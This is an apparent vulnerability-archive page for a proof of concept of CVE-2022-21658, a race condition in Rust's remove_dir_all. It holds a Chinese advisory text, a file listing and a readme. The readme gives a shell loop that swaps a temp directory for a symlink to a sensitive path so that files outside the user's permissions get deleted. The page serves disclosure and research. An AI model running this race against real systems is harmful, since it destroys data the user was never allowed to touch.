CVE-2022-21658 PoC — Rust 竞争条件问题漏洞

Source

https://github.com/sagittarius-a/cve-2022-21658

Associated Vulnerability

Title:Rust 竞争条件问题漏洞 (CVE-2022-21658)
Description:Rust是Mozilla基金会的一款通用、编译型编程语言。 Rust 中存在竞争条件问题漏洞，该漏洞源于产品的std::fs::remove_dir_all函数未对用户权限进行有效验证。攻击者可通过该漏洞删除不能访问的文件和目录。以下产品及版本受到影响：Rust 1.0.0 至 1.58.0 版本。

Description

POC for cve-2022-21658

Readme

# CVE-2022-21658 poc

**Make sure the use the Rust 1.58.0 version**.

First run:
```sh
while :; do mkdir /tmp/legit; rm -r /tmp/legit; ln -s /tmp/sensitive /tmp/legit; done
```

Then:
```sh
cargo run
```

File Snapshot


 [4.0K]  /data/pocs/0a632997ca36e77183495e7a1d8c89b78dc53e4b
├── [ 158]  Cargo.lock
├── [ 183]  Cargo.toml
├── [ 203]  README.md
└── [4.0K]  src
    └── [1.9K]  main.rs

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!